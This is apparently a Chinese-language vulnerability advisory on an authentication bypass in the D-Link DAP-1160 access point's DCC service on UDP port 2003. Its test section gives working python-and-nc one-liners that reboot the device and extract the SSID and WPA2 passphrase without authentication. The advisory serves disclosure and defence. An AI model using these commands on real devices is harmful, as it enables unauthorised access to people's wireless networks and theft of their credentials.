D-Link DAP-1160无线AP DCC协议绕过安全限制漏洞

受影响系统:

D-Link DAP-1160 1.31 b01
D-Link DAP-1160 1.30 b10
D-Link DAP-1160 1.20 b06

描述:

D-Link DAP-1160是一款小型的无线AP。

DAP-1160设备的UDP 2003端口上监听着DCCD守护程序,用于通过DCC协议对设备畸形配置。如果远程用户向dccd守护程序发送了特制的UDP报文,就可以无需认证执行各种操作,包括检索敏感的无线配置参数、重启设备或修改参数并配置设备。

<*来源:Cristofaro Mune
  
  链接:
http://marc.info/?l=bugtraq&m=127774246918301&w=2
*>

测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

 

– 远程重启
python -c ‘print "\x05" + "\x00" * 7’ | nc -u <IP_ADDR> 2003

– 检索Wi-Fi SSID
python -c ‘print "\x03" + "\x00" * 7 + "\x21\x27\x00"’ | nc -o ssid.txt -u <IP_ADDR> 2003
cat ssid.txt (接收到的数据报中21 27 xx xx后显示明文的SSID)

– 检索WPA2 PSK
python -c ‘print "\x03" + "\x00" * 7 + "\x23\x27\x00\x00\x24\x27\x00"’ | nc -u -o pass.txt <IP_ADDR> 2003
cat pass.txt (接收到的数据报中24 27 xx xx后显示明文的WPA2 PSK)

建议:

厂商补丁:

D-Link
——
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.dlink.com/

发表评论?

0 条评论。

发表评论